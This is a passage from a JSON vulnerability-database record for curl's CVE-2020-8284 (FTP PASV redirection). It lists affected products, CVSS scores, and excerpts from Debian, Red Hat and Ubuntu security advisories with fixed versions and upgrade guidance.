        "_id": null,
        "model": "communications billing and revenue management",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "12.0.0.3.0"
      },
      {
        "_id": null,
        "model": "mac os x",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apple",
        "version": "10.15.7"
      },
      {
        "_id": null,
        "model": "sinec infrastructure network services",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "siemens",
        "version": "1.0.1.1"
      },
      {
        "_id": null,
        "model": "m10-1",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "fujitsu",
        "version": "xcp3110"
      },
      {
        "_id": null,
        "model": "m10-4s",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "fujitsu",
        "version": "xcp3110"
      },
      {
        "_id": null,
        "model": "mac os x",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "apple",
        "version": "10.15"
      },
      {
        "_id": null,
        "model": "curl",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "haxx",
        "version": "7.73.0"
      },
      {
        "_id": null,
        "model": "mac os x",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apple",
        "version": "10.14.6"
      },
      {
        "_id": null,
        "model": "m10-4",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "fujitsu",
        "version": "xcp2410"
      },
      {
        "_id": null,
        "model": "universal forwarder",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "splunk",
        "version": "9.1.0"
      },
      {
        "_id": null,
        "model": "fedora",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "fedoraproject",
        "version": "32"
      },
      {
        "_id": null,
        "model": "universal forwarder",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "splunk",
        "version": "9.0.6"
      },
      {
        "_id": null,
        "model": "solidfire",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "macos",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apple",
        "version": "11.1"
      },
      {
        "_id": null,
        "model": "peoplesoft enterprise peopletools",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "8.58"
      },
      {
        "_id": null,
        "model": "universal forwarder",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "splunk",
        "version": "9.0.0"
      },
      {
        "_id": null,
        "model": "m12-2",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "fujitsu",
        "version": "xcp2410"
      },
      {
        "_id": null,
        "model": "macos",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apple",
        "version": "11.2"
      },
      {
        "_id": null,
        "model": "universal forwarder",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "splunk",
        "version": "8.2.0"
      },
      {
        "_id": null,
        "model": "m12-1",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "fujitsu",
        "version": "xcp2410"
      },
      {
        "_id": null,
        "model": "mac os x",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "apple",
        "version": "10.15.7"
      },
      {
        "_id": null,
        "model": "hci management node",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "m10-4",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "fujitsu",
        "version": "xcp3110"
      },
      {
        "_id": null,
        "model": "mac os x",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "apple",
        "version": "10.14.6"
      },
      {
        "_id": null,
        "model": "m12-2",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "fujitsu",
        "version": "xcp3110"
      },
      {
        "_id": null,
        "model": "hci storage node",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "m12-2s",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "fujitsu",
        "version": "xcp2410"
      },
      {
        "_id": null,
        "model": "hci bootstrap os",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "mac os x",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "apple",
        "version": "10.14.0"
      },
      {
        "_id": null,
        "model": "m12-1",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "fujitsu",
        "version": "xcp3110"
      },
      {
        "_id": null,
        "model": "m10-4s",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "fujitsu",
        "version": "xcp2410"
      },
      {
        "_id": null,
        "model": "m10-1",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "fujitsu",
        "version": "xcp2410"
      },
      {
        "_id": null,
        "model": "communications cloud native core policy",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "1.14.0"
      },
      {
        "_id": null,
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "9.0"
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2020-8284"
      }
    ]
  },
  "credits": {
    "_id": null,
    "data": "Red Hat",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "163193"
      },
      {
        "db": "PACKETSTORM",
        "id": "163197"
      },
      {
        "db": "PACKETSTORM",
        "id": "163267"
      },
      {
        "db": "PACKETSTORM",
        "id": "163276"
      },
      {
        "db": "PACKETSTORM",
        "id": "162877"
      },
      {
        "db": "PACKETSTORM",
        "id": "164192"
      }
    ],
    "trust": 0.6
  },
  "cve": "CVE-2020-8284",
  "cvss": {
    "_id": null,
    "data": [
      {
        "cvssV2": [
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "nvd@nist.gov",
            "availabilityImpact": "NONE",
            "baseScore": 4.3,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 8.6,
            "id": "CVE-2020-8284",
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "severity": "MEDIUM",
            "trust": 1.1,
            "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "NONE",
            "baseScore": 4.3,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 8.6,
            "id": "VHN-186409",
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "severity": "MEDIUM",
            "trust": 0.1,
            "vectorString": "AV:N/AC:M/AU:N/C:P/I:N/A:N",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "HIGH",
            "attackVector": "NETWORK",
            "author": "nvd@nist.gov",
            "availabilityImpact": "NONE",
            "baseScore": 3.7,
            "baseSeverity": "LOW",
            "confidentialityImpact": "LOW",
            "exploitabilityScore": 2.2,
            "id": "CVE-2020-8284",
            "impactScore": 1.4,
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N",
            "version": "3.1"
          }
        ],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2020-8284",
            "trust": 1.0,
            "value": "LOW"
          },
          {
            "author": "VULHUB",
            "id": "VHN-186409",
            "trust": 0.1,
            "value": "MEDIUM"
          },
          {
            "author": "VULMON",
            "id": "CVE-2020-8284",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-186409"
      },
      {
        "db": "VULMON",
        "id": "CVE-2020-8284"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-8284"
      }
    ]
  },
  "description": {
    "_id": null,
    "data": "A malicious server can use the FTP PASV response to trick curl 7.73.0 and earlier into connecting back to a given IP address and port, and this way potentially make curl extract information about services that are otherwise private and not disclosed, for example doing port scanning and service banner extractions. HAXX Haxx curl is a set of file transfer tools that use the URL syntax to work under the command line of the Swedish Haxx (HAXX) company. The tool supports file upload and download and includes a libcurl (client URL transfer library) for program development. There is a security vulnerability in Haxx curl FTP PASV Responses. Attackers can use this vulnerability to bypass data access restrictions and obtain sensitive information through curl\u0027s FTP PASV Responses. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA512\n\n- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4881-1                   security@debian.org\nhttps://www.debian.org/security/                       Alessandro Ghedini\nMarch 30, 2021                        https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage        : curl\nCVE ID         : CVE-2020-8169 CVE-2020-8177 CVE-2020-8231 CVE-2020-8284 \n                 CVE-2020-8285 CVE-2020-8286 CVE-2021-22876 CVE-2021-22890\nDebian Bug     : 965280 965281 968831 977161 977162 977163\n\nMultiple vulnerabilities were discovered in cURL, an URL transfer library:\n\nCVE-2020-8169\n\n    Marek Szlagor reported that libcurl could be tricked into prepending\n    a part of the password to the host name before it resolves it,\n    potentially leaking the partial password over the network and to the\n    DNS server(s). \n\nCVE-2020-8177\n\n    sn reported that curl could be tricked by a malicious server into\n    overwriting a local file when using th -J (--remote-header-name) and\n    -i (--include) options in the same command line. \n\nCVE-2020-8231\n\n    Marc Aldorasi reported that libcurl might use the wrong connection\n    when an application using libcurl\u0027s multi API sets the option\n    CURLOPT_CONNECT_ONLY, which could lead to information leaks. \n\nCVE-2020-8285\n\n    xnynx reported that libcurl could run out of stack space when using\n    tha FTP wildcard matching functionality (CURLOPT_CHUNK_BGN_FUNCTION). \n\nCVE-2020-8286\n\n    It was reported that libcurl didn\u0027t verify that an OCSP response\n    actually matches the certificate it is intended to. \n\nCVE-2021-22876\n\n    Viktor Szakats reported that libcurl does not strip off user\n    credentials from the URL when automatically populating the Referer\n    HTTP request header field in outgoing HTTP requests. \n\nCVE-2021-22890\n\n    Mingtao Yang reported that, when using an HTTPS proxy and TLS 1.3,\n    libcurl could confuse session tickets arriving from the HTTPS proxy\n    as if they arrived from the remote server instead. This could allow\n    an HTTPS proxy to trick libcurl into using the wrong session ticket\n    for the host and thereby circumvent the server TLS certificate check. \n\nFor the stable distribution (buster), these problems have been fixed in\nversion 7.64.0-4+deb10u2. \n\nWe recommend that you upgrade your curl packages. \n\nFor the detailed security status of curl please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/curl\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n-----BEGIN PGP SIGNATURE-----\n\niQIzBAEBCgAdFiEEBsId305pBx+F583DbwzL4CFiRygFAmBkQCoACgkQbwzL4CFi\nRyg6Gg/+LqhhJ8+D7skevVkYzxHzdH2yT/XMeoYp0D37yHmEfH9PyjXwfplG+XEw\n/xwFRBK8qxD1ja+rQddYyeTvi1OMnMgMS3UsRHlfeMnLxh2+oHnvHDYG848npUEZ\nRq4YFoc/n9YTAJZP/G4oiuBeXqH2Sqa5hSNT6VrYfRciCxkYnzA78b85KpI8aYyR\nlhfiJMNpwrqDbt/QzblpELBkGMIV402VeiqDwHfcVzm2E810xXQNLvPMbWtvDYkA\nTSrNsdqfuFr1tuQSZY6CGSWEyXtB/tOo8+pvUixlJMBWJMl5TXEcJkD5ckehx0yb\nC3n9yapfklxHiG9lD4zwwIJDqd3Y4SxdDiSlUC4OhdvpwniMygX0S3ICaPA4iac/\ncWanml0Fop3OmRy+vQURTd3sADoT5HoRSUXZVU+HdTrRaEt2xs5okZkWSd3yr4Ux\ni+HgjUAFkkk8DLRB68Bbpx1LGxFGQT7L8yd4wsWINXlzASIP1A5dnNfE5w0VWOHG\n3KDq47wNfjuiZC8GXW+HQCxz5MijnS8Y/Egl0OozNFDwEitNBZEsIjpZaZBdZIwi\nUFfcK7+u/y/TRY54rA4erkdcHFwpYW5EZVGdb7Z+WPWVlzw0ImXrM68LSAhHQaqW\n1Hx4VwwwTsMIPnrx2kriRiiDPOW1r5Kip3yHa+QZLedSRGibQWk=\n=001T\n-----END PGP SIGNATURE-----\n. This software, such as Apache HTTP Server, is\ncommon to multiple JBoss middleware products, and is packaged under Red Hat\nJBoss Core Services to allow for faster distribution of updates, and for a\nmore consistent update experience. \n\nThis release adds the new Apache HTTP Server 2.4.37 Service Pack 8 packages\nthat are part of the JBoss Core Services offering. \n\nThis release serves as a replacement for Red Hat JBoss Core Services Pack\nApache Server 2.4.37 Service Pack 7 and includes bug fixes and\nenhancements. Refer to the Release Notes for information on the most\nsignificant bug fixes and enhancements included in this release. \n\nSecurity Fix(es):\n\n* curl: Use-after-free in TLS session handling when using OpenSSL TLS\nbackend (CVE-2021-22901)\n\n* httpd: NULL pointer dereference on specially crafted HTTP/2 request\n(CVE-2021-31618)\n\n* libcurl: partial password leak over DNS on HTTP redirect (CVE-2020-8169)\n\n* curl: FTP PASV command response can cause curl to connect to arbitrary\nhost (CVE-2020-8284)\n\n* curl: Malicious FTP server can trigger stack overflow when\nCURLOPT_CHUNK_BGN_FUNCTION is used (CVE-2020-8285)\n\n* curl: Inferior OCSP verification (CVE-2020-8286)\n\n* curl: Leak of authentication credentials in URL via automatic Referer\n(CVE-2021-22876)\n\n* curl: TLS 1.3 session ticket mix-up with HTTPS proxy host\n(CVE-2021-22890)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. Solution:\n\nBefore applying the update, back up your existing installation, including\nall applications, configuration files, databases and database settings, and\nso on. \n\nThe References section of this erratum contains a download link for the\nupdate. You must be logged in to download the update. Bugs fixed (https://bugzilla.redhat.com/):\n\n1847916 - CVE-2020-8169 libcurl: partial password leak over DNS on HTTP redirect\n1902667 - CVE-2020-8284 curl: FTP PASV command response can cause curl to connect to arbitrary host\n1902687 - CVE-2020-8285 curl: Malicious FTP server can trigger stack overflow when CURLOPT_CHUNK_BGN_FUNCTION is used\n1906096 - CVE-2020-8286 curl: Inferior OCSP verification\n1941964 - CVE-2021-22876 curl: Leak of authentication credentials in URL via automatic Referer\n1941965 - CVE-2021-22890 curl: TLS 1.3 session ticket mix-up with HTTPS proxy host\n1963146 - CVE-2021-22901 curl: Use-after-free in TLS session handling when using OpenSSL TLS backend\n1968013 - CVE-2021-31618 httpd: NULL pointer dereference on specially crafted HTTP/2 request\n\n5. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nAfter installing the updated packages, the httpd daemon will be restarted\nautomatically. Applications using the APR libraries, such as httpd, must be\nrestarted for this update to take effect.  Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. Bugs fixed (https://bugzilla.redhat.com/):\n\n1897635 - CVE-2020-28362 golang: math/big: panic during recursive division of very large numbers\n1918750 - CVE-2021-3114 golang: crypto/elliptic: incorrect operations on the P-224 curve\n\n5. JIRA issues fixed (https://issues.jboss.org/):\n\nTRACING-1725 -  Elasticsearch operator reports x509 errors communicating with ElasticSearch in OpenShift Service Mesh project\n\n6. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n=====================================================================\n                   Red Hat Security Advisory\n\nSynopsis:          Moderate: OpenShift Container Platform 4.7.13 bug fix and security update\nAdvisory ID:       RHSA-2021:2121-01\nProduct:           Red Hat OpenShift Enterprise\nAdvisory URL:      https://access.redhat.com/errata/RHSA-2021:2121\nIssue date:        2021-06-01\nCVE Names:         CVE-2016-10228 CVE-2019-2708 CVE-2019-3842 \n                   CVE-2019-9169 CVE-2019-13012 CVE-2019-14866 \n                   CVE-2019-18811 CVE-2019-19523 CVE-2019-19528 \n                   CVE-2019-25013 CVE-2019-25032 CVE-2019-25034 \n                   CVE-2019-25035 CVE-2019-25036 CVE-2019-25037 \n                   CVE-2019-25038 CVE-2019-25039 CVE-2019-25040 \n                   CVE-2019-25041 CVE-2019-25042 CVE-2020-0431 \n                   CVE-2020-8231 CVE-2020-8284 CVE-2020-8285 \n                   CVE-2020-8286 CVE-2020-8927 CVE-2020-9948 \n                   CVE-2020-9951 CVE-2020-9983 CVE-2020-10543 \n                   CVE-2020-10878 CVE-2020-11608 CVE-2020-12114 \n                   CVE-2020-12362 CVE-2020-12464 CVE-2020-13434 \n                   CVE-2020-13543 CVE-2020-13584 CVE-2020-13776 \n                   CVE-2020-14314 CVE-2020-14344 CVE-2020-14345 \n                   CVE-2020-14346 CVE-2020-14347 CVE-2020-14356 \n                   CVE-2020-14360 CVE-2020-14361 CVE-2020-14362 \n                   CVE-2020-14363 CVE-2020-15358 CVE-2020-15437 \n                   CVE-2020-15586 CVE-2020-16845 CVE-2020-24330 \n                   CVE-2020-24331 CVE-2020-24332 CVE-2020-24394 \n                   CVE-2020-24977 CVE-2020-25212 CVE-2020-25284 \n                   CVE-2020-25285 CVE-2020-25643 CVE-2020-25659 \n                   CVE-2020-25704 CVE-2020-25712 CVE-2020-26116 \n                   CVE-2020-26137 CVE-2020-27618 CVE-2020-27619 \n                   CVE-2020-27783 CVE-2020-27786 CVE-2020-27835 \n                   CVE-2020-28196 CVE-2020-28935 CVE-2020-28974 \n                   CVE-2020-29361 CVE-2020-29362 CVE-2020-29363 \n                   CVE-2020-35508 CVE-2020-36242 CVE-2020-36322 \n                   CVE-2021-0342 CVE-2021-3121 CVE-2021-3177 \n                   CVE-2021-3326 CVE-2021-21642 CVE-2021-21643 \n                   CVE-2021-21644 CVE-2021-21645 CVE-2021-23336 \n                   CVE-2021-25215 CVE-2021-30465 \n=====================================================================\n\n1. Summary:\n\nRed Hat OpenShift Container Platform release 4.7.13 is now available with\nupdates to packages and images that fix several bugs. \n\nThis release includes a security update for Red Hat OpenShift Container\nPlatform 4.7. \n\nRed Hat Product Security has rated this update as having a security impact\nof Moderate. A Common Vulnerability Scoring System (CVSS) base score, which\ngives a detailed severity rating, is available for each vulnerability from\nthe CVE link(s) in the References section. \n\n2. Description:\n\nRed Hat OpenShift Container Platform is Red Hat\u0027s cloud computing\nKubernetes application platform solution designed for on-premise or private\ncloud deployments. \n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\nThis advisory contains the container images for Red Hat OpenShift Container\nPlatform 4.7.13. See the following advisory for the RPM packages for this\nrelease:\n\nhttps://access.redhat.com/errata/RHSA-2021:2122\n\nSpace precludes documenting all of the container images in this advisory. \nSee the following Release Notes documentation, which will be updated\nshortly for this release, for details about these changes:\n\nhttps://docs.openshift.com/container-platform/4.7/release_notes/ocp-4-7-rel\nease-notes.html\n\nThis update fixes the following bug among others:\n\n* Previously, resources for the ClusterOperator were being created early in\nthe update process, which led to update failures when the ClusterOperator\nhad no status condition while Operators were updating. This bug fix changes\nthe timing of when these resources are created. As a result, updates can\ntake place without errors. (BZ#1959238)\n\nSecurity Fix(es):\n\n* gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index\nvalidation (CVE-2021-3121)\n\nYou may download the oc tool and use it to inspect release image metadata\nas follows:\n\n(For x86_64 architecture)\n\n  $ oc adm release info\nquay.io/openshift-release-dev/ocp-release:4.7.13-x86_64\n\nThe image digest is\nsha256:783a2c963f35ccab38e82e6a8c7fa954c3a4551e07d2f43c06098828dd986ed4\n\n(For s390x architecture)\n\n  $ oc adm release info\nquay.io/openshift-release-dev/ocp-release:4.7.13-s390x\n\nThe image digest is\nsha256:4cf44e68413acad063203e1ee8982fd01d8b9c1f8643a5b31cd7ff341b3199cd\n\n(For ppc64le architecture)\n\n  $ oc adm release info\nquay.io/openshift-release-dev/ocp-release:4.7.13-ppc64le\n\nThe image digest is\nsha256:d47ce972f87f14f1f3c5d50428d2255d1256dae3f45c938ace88547478643e36\n\nAll OpenShift Container Platform 4.7 users are advised to upgrade to these\nupdated packages and images when they are available in the appropriate\nrelease channel. To check for available updates, use the OpenShift Console\nor the CLI oc command. Instructions for upgrading a cluster are available\nat\nhttps://docs.openshift.com/container-platform/4.7/updating/updating-cluster\n- -between-minor.html#understanding-upgrade-channels_updating-cluster-between\n- -minor\n\n3. Solution:\n\nFor OpenShift Container Platform 4.7 see the following documentation, which\nwill be updated shortly for this release, for important instructions on how\nto upgrade your cluster and fully apply this asynchronous errata update:\n\nhttps://docs.openshift.com/container-platform/4.7/release_notes/ocp-4-7-rel\nease-notes.html\n\nDetails on how to access this content are available at\nhttps://docs.openshift.com/container-platform/4.7/updating/updating-cluster\n- -cli.html\n\n4. Bugs fixed (https://bugzilla.redhat.com/):\n\n1921650 - CVE-2021-3121 gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index validation\n1923268 - [Assisted-4.7] [Staging] Using two both spelling \"canceled\"  \"cancelled\"\n1947216 - [AWS] Missing iam:ListAttachedRolePolicies permission in permissions.go\n1953963 - Enable/Disable host operations returns cluster resource with incomplete hosts list\n1957749 - ovn-kubernetes pod should have CPU and memory requests set but not limits\n1959238 - CVO creating cloud-controller-manager too early causing upgrade failures\n1960103 - SR-IOV obliviously reboot the node\n1961941 - Local Storage Operator using LocalVolume CR fails to create PV\u0027s when backend storage failure is simulated\n1962302 - packageserver clusteroperator does not set reason or message for Available condition\n1962312 - Deployment considered unhealthy despite being available and at latest generation\n1962435 - Public DNS records were not deleted when destroying a cluster which is using byo private hosted zone\n1963115 - Test verify /run filesystem contents failing\n\n5. References:\n\nhttps://access.redhat.com/security/cve/CVE-2016-10228\nhttps://access.redhat.com/security/cve/CVE-2019-2708\nhttps://access.redhat.com/security/cve/CVE-2019-3842\nhttps://access.redhat.com/security/cve/CVE-2019-9169\nhttps://access.redhat.com/security/cve/CVE-2019-13012\nhttps://access.redhat.com/security/cve/CVE-2019-14866\nhttps://access.redhat.com/security/cve/CVE-2019-18811\nhttps://access.redhat.com/security/cve/CVE-2019-19523\nhttps://access.redhat.com/security/cve/CVE-2019-19528\nhttps://access.redhat.com/security/cve/CVE-2019-25013\nhttps://access.redhat.com/security/cve/CVE-2019-25032\nhttps://access.redhat.com/security/cve/CVE-2019-25034\nhttps://access.redhat.com/security/cve/CVE-2019-25035\nhttps://access.redhat.com/security/cve/CVE-2019-25036\nhttps://access.redhat.com/security/cve/CVE-2019-25037\nhttps://access.redhat.com/security/cve/CVE-2019-25038\nhttps://access.redhat.com/security/cve/CVE-2019-25039\nhttps://access.redhat.com/security/cve/CVE-2019-25040\nhttps://access.redhat.com/security/cve/CVE-2019-25041\nhttps://access.redhat.com/security/cve/CVE-2019-25042\nhttps://access.redhat.com/security/cve/CVE-2020-0431\nhttps://access.redhat.com/security/cve/CVE-2020-8231\nhttps://access.redhat.com/security/cve/CVE-2020-8284\nhttps://access.redhat.com/security/cve/CVE-2020-8285\nhttps://access.redhat.com/security/cve/CVE-2020-8286\nhttps://access.redhat.com/security/cve/CVE-2020-8927\nhttps://access.redhat.com/security/cve/CVE-2020-9948\nhttps://access.redhat.com/security/cve/CVE-2020-9951\nhttps://access.redhat.com/security/cve/CVE-2020-9983\nhttps://access.redhat.com/security/cve/CVE-2020-10543\nhttps://access.redhat.com/security/cve/CVE-2020-10878\nhttps://access.redhat.com/security/cve/CVE-2020-11608\nhttps://access.redhat.com/security/cve/CVE-2020-12114\nhttps://access.redhat.com/security/cve/CVE-2020-12362\nhttps://access.redhat.com/security/cve/CVE-2020-12464\nhttps://access.redhat.com/security/cve/CVE-2020-13434\nhttps://access.redhat.com/security/cve/CVE-2020-13543\nhttps://access.redhat.com/security/cve/CVE-2020-13584\nhttps://access.redhat.com/security/cve/CVE-2020-13776\nhttps://access.redhat.com/security/cve/CVE-2020-14314\nhttps://access.redhat.com/security/cve/CVE-2020-14344\nhttps://access.redhat.com/security/cve/CVE-2020-14345\nhttps://access.redhat.com/security/cve/CVE-2020-14346\nhttps://access.redhat.com/security/cve/CVE-2020-14347\nhttps://access.redhat.com/security/cve/CVE-2020-14356\nhttps://access.redhat.com/security/cve/CVE-2020-14360\nhttps://access.redhat.com/security/cve/CVE-2020-14361\nhttps://access.redhat.com/security/cve/CVE-2020-14362\nhttps://access.redhat.com/security/cve/CVE-2020-14363\nhttps://access.redhat.com/security/cve/CVE-2020-15358\nhttps://access.redhat.com/security/cve/CVE-2020-15437\nhttps://access.redhat.com/security/cve/CVE-2020-15586\nhttps://access.redhat.com/security/cve/CVE-2020-16845\nhttps://access.redhat.com/security/cve/CVE-2020-24330\nhttps://access.redhat.com/security/cve/CVE-2020-24331\nhttps://access.redhat.com/security/cve/CVE-2020-24332\nhttps://access.redhat.com/security/cve/CVE-2020-24394\nhttps://access.redhat.com/security/cve/CVE-2020-24977\nhttps://access.redhat.com/security/cve/CVE-2020-25212\nhttps://access.redhat.com/security/cve/CVE-2020-25284\nhttps://access.redhat.com/security/cve/CVE-2020-25285\nhttps://access.redhat.com/security/cve/CVE-2020-25643\nhttps://access.redhat.com/security/cve/CVE-2020-25659\nhttps://access.redhat.com/security/cve/CVE-2020-25704\nhttps://access.redhat.com/security/cve/CVE-2020-25712\nhttps://access.redhat.com/security/cve/CVE-2020-26116\nhttps://access.redhat.com/security/cve/CVE-2020-26137\nhttps://access.redhat.com/security/cve/CVE-2020-27618\nhttps://access.redhat.com/security/cve/CVE-2020-27619\nhttps://access.redhat.com/security/cve/CVE-2020-27783\nhttps://access.redhat.com/security/cve/CVE-2020-27786\nhttps://access.redhat.com/security/cve/CVE-2020-27835\nhttps://access.redhat.com/security/cve/CVE-2020-28196\nhttps://access.redhat.com/security/cve/CVE-2020-28935\nhttps://access.redhat.com/security/cve/CVE-2020-28974\nhttps://access.redhat.com/security/cve/CVE-2020-29361\nhttps://access.redhat.com/security/cve/CVE-2020-29362\nhttps://access.redhat.com/security/cve/CVE-2020-29363\nhttps://access.redhat.com/security/cve/CVE-2020-35508\nhttps://access.redhat.com/security/cve/CVE-2020-36242\nhttps://access.redhat.com/security/cve/CVE-2020-36322\nhttps://access.redhat.com/security/cve/CVE-2021-0342\nhttps://access.redhat.com/security/cve/CVE-2021-3121\nhttps://access.redhat.com/security/cve/CVE-2021-3177\nhttps://access.redhat.com/security/cve/CVE-2021-3326\nhttps://access.redhat.com/security/cve/CVE-2021-21642\nhttps://access.redhat.com/security/cve/CVE-2021-21643\nhttps://access.redhat.com/security/cve/CVE-2021-21644\nhttps://access.redhat.com/security/cve/CVE-2021-21645\nhttps://access.redhat.com/security/cve/CVE-2021-23336\nhttps://access.redhat.com/security/cve/CVE-2021-25215\nhttps://access.redhat.com/security/cve/CVE-2021-30465\nhttps://access.redhat.com/security/updates/classification/#moderate\n\n6. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2021 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBYLXBgdzjgjWX9erEAQiYKw/+MeUvVzbi9kHuo6vE8J9xEQCvgpJtLfRM\nyj4VFCt8lkWmfGmuAMd5LkvD5suav1Gu9yA6E60VvKrorV6+PDOZ8jiUyzRR+di6\nTZZ7Ji6taqaQUuf451KF39zuxYAh29pKT6mZMhmqK65jEg7uj66R8+P2p7tahaai\nKkqe6LKxNCXyVzWmc5HHkc3AJJ6vSVIuMeA6KOHpXy0vy57jZKeyb3dau0BVl/ir\nZbnbOHdTJ+7hEVV3yGwARcVgUhHDcHiSYAS+RUj7Hqx0RIFilb9RbOdoEdbauaWx\nCGIdSYmj1F4apCZuYWmhZxtQ5/Lsj7EPi+7UleyTzqgMQsqSr8kvxGe/yzfY+yAQ\n++QCSnleeKu/+HjN72d73h8yWGGzMrc/rYwDJWcFwjIL6/pj4Tgm4OK30vJlQUz5\n3gHuEDz+j42s270cv6dRDd9v5xpexxIOXyHzruFRLk4xVCnS17PGeJ4I9mJmkYxL\n5GuCiMnixToobWtmrh9MX2Qjkhj81o4E+rLMvG/4yUk2kGejo/nLwgZNsSz8gN5Z\ngMZOYSDys2zJu6/jmxY/8MXzS3yNIJj3FxXe7w5XA0mHUuuZ/EaJsMLnlCCSRARV\nGpMwj1/Aj1ZSNeYplr2YwQz7lB7hp+J/vn567zBPeYQus5EAyzqzudTbSLdm8ZyL\nPEh85hYKLe4=\n=Xe05\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://listman.redhat.com/mailman/listinfo/rhsa-announce\n. ==========================================================================\nUbuntu Security Notice USN-4665-2\nDecember 09, 2020\n\ncurl vulnerabilities\n==========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 14.04 ESM\n- Ubuntu 12.04 ESM\n\nSummary:\n\nSeveral security issues were fixed in curl. \n\nSoftware Description:\n- curl: HTTP, HTTPS, and FTP client and client libraries\n\nDetails:\n\nUSN-4665-1 fixed several vulnerabilities in curl. This update provides\nthe corresponding update for Ubuntu 12.04 ESM and Ubuntu 14.04 ESM. \n\nOriginal advisory details:\n\n Varnavas Papaioannou discovered that curl incorrectly handled FTP PASV\n responses. (CVE-2020-8284)\n\n It was discovered that curl incorrectly handled FTP wildcard matchins. A\n remote attacker could possibly use this issue to cause curl to consume\n resources and crash, resulting in a denial of service. (CVE-2020-8285)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 14.04 ESM:\n  curl                            7.35.0-1ubuntu2.20+esm6\n  libcurl3                        7.35.0-1ubuntu2.20+esm6\n  libcurl3-gnutls                 7.35.0-1ubuntu2.20+esm6\n  libcurl3-nss                    7.35.0-1ubuntu2.20+esm6\n\nUbuntu 12.04 ESM:\n  curl                            7.22.0-3ubuntu4.29\n  libcurl3                        7.22.0-3ubuntu4.29\n  libcurl3-gnutls                 7.22.0-3ubuntu4.29\n  libcurl3-nss                    7.22.0-3ubuntu4.29\n\nIn general, a standard system update will make all the necessary changes. \n\nSecurity 